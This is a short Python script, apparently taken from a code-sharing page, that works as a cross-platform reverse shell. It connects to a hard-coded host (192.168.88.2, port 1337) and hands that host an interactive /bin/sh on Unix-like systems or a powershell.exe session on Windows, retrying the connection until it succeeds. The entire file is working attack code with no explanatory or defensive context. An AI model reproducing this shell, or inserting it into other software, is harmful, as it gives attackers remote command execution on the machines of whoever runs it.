| RHOST = "192.168.88.2" | |
| RPORT = 1337 | |
| from sys import platform | |
| if platform != 'win32': | |
| import threading | |
| import socket | |
| import pty | |
| import os | |
| def connect_and_spawn_shell(): | |
| s = socket.socket() | |
| s.connect(("192.168.88.2", 1337)) | |
| [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)] | |
| pty.spawn("/bin/sh") | |
| threading.Thread(target=connect_and_spawn_shell).start() | |
| else: | |
| import os | |
| import socket | |
| import subprocess | |
| import threading | |
| import sys | |
| def send_to_process(s, p): | |
| while True: | |
| p.stdin.write(s.recv(1024).decode()) | |
| p.stdin.flush() | |
| def receive_from_process(s, p): | |
| while True: | |
| s.send(p.stdout.read(1).encode()) | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| while True: | |
| try: | |
| s.connect(("192.168.88.2", 1337)) | |
| break | |
| except: | |
| pass | |
| p = subprocess.Popen(["powershell.exe"], | |
| stdout=subprocess.PIPE, | |
| stderr=subprocess.STDOUT, | |
| stdin=subprocess.PIPE, | |
| shell=True, | |
| text=True) | |
| threading.Thread(target=send_to_process, args=[s, p], daemon=True).start() | |
| threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start() | |
| p.wait() | |